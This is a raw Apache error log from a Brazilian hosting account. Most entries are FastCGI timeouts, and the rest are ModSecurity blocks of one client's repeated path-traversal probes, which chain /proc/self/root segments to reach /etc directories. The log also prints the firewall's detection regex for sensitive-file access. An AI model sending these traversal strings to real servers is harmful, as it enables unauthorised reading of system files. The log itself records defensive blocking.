[Thu Mar 19 08:31:33.129824 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47060] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:32:01.134436 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47740] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:32:16.100845 2026] [mime_magic:error] [pid 30077:tid 140411649607424] (70014)End of file found: [client 57.141.18.20:50134] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:32:29.133810 2026] [proxy_fcgi:error] [pid 14269:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48422] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:32:34.557888 2026] [mime_magic:error] [pid 31803:tid 140411582465792] (70014)End of file found: [client 57.141.18.20:50462] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:32:51.133798 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48890] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:33:16.137806 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49464] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:33:39.134767 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49982] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:34:03.133813 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50602] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:34:18.943488 2026] [mime_magic:error] [pid 27403:tid 140411641214720] (70014)End of file found: [client 57.141.18.61:51882] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:34:26.145821 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51044] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:34:36.722999 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.244.43:43066] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvfTMdf6f5d65gmYZRjIwAAAsI"]
[Thu Mar 19 08:34:40.335725 2026] [core:alert] [pid 19093:tid 140411565680384] [client 57.141.18.73:53300] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:34:46.477101 2026] [core:alert] [pid 27293:tid 140411632822016] [client 57.141.18.97:53432] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:34:49.137793 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51644] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:34:57.438436 2026] [mime_magic:error] [pid 15826:tid 140411666392832] (70014)End of file found: [client 57.141.18.97:53528] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:35:14.157799 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52102] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:35:42.129832 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52660] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:36:08.145788 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:53266] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:36:26.341793 2026] [mime_magic:error] [pid 30077:tid 140411557287680] (70014)End of file found: [client 57.141.18.94:55872] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:36:33.129798 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:36:58.635644 2026] [:error] [pid 14269:tid 140411733534464] [client 74.7.243.128:55560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvf2gbLMZ6AikZjR9VLzAAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 08:36:59.121810 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54552] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:37:26.903393 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.228.61:60258] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvf9gkwaGbbGflqUZCsNgAAAMM"]
[Thu Mar 19 08:37:28.129796 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55264] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:37:51.125830 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55760] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:38:04.587808 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:39652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvgHNa6ubjKNq_cu4Y9EwAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:38:15.133863 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56326] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:38:41.089799 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56876] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:39:10.121854 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:57650] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:39:17.859099 2026] [:error] [pid 19093:tid 140411683178240] [client 74.7.243.128:50048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvgZV_V7PWP6ixUYl6sWQAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:39:35.129769 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58206] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:39:38.378905 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.244.43:50892] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvgevu8EFLIOrSqIpuSfgAAAlg"]
[Thu Mar 19 08:39:58.129791 2026] [proxy_fcgi:error] [pid 19093:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58778] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:39:58.234710 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:53938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvgjeyqAr6etmhZHNpRrQAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:40:01.909989 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:56258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvgkcdf6f5d65gmYZRj7gAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 08:40:20.121801 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59344] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:40:39.739302 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:56262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvgtwkwaGbbGflqUZCszwAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:40:43.141192 2026] [proxy_fcgi:error] [pid 27403:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59868] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:41:04.388280 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.243.128:40426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvgzwbLMZ6AikZjR9VMWQAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:41:05.125811 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60376] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:41:26.982090 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:43434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvg5uyqAr6etmhZHNpR4AAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:41:31.043208 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:32818] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:41:48.251260 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.243.128:49056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvg_AbLMZ6AikZjR9VMawAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 08:41:58.485822 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33444] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:42:19.494940 2026] [:error] [pid 27293:tid 140411565680384] [client 74.7.243.128:39258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvhG_-YZRR_7pZ7nDJ8xgAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:42:25.133813 2026] [proxy_fcgi:error] [pid 27403:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34110] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:42:27.847921 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.228.61:44524] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvhI_u8EFLIOrSqIpuTIAAAAkY"]
[Thu Mar 19 08:42:49.769907 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:34674] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:43:15.793797 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:35228] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:43:20.023840 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:60984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvhWAkwaGbbGflqUZCtRgAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:43:27.193484 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.243.128:59582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvhXxkFeYa1D6dYQnDfoAAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 08:43:43.053963 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:35882] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:43:47.115159 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:41812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvhcwkwaGbbGflqUZCtVAAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:44:04.846967 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.243.128:56520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvhhF_V7PWP6ixUYl6s2wAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:44:08.639101 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:56316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvhiPu8EFLIOrSqIpuTZwAAAko"], referer: 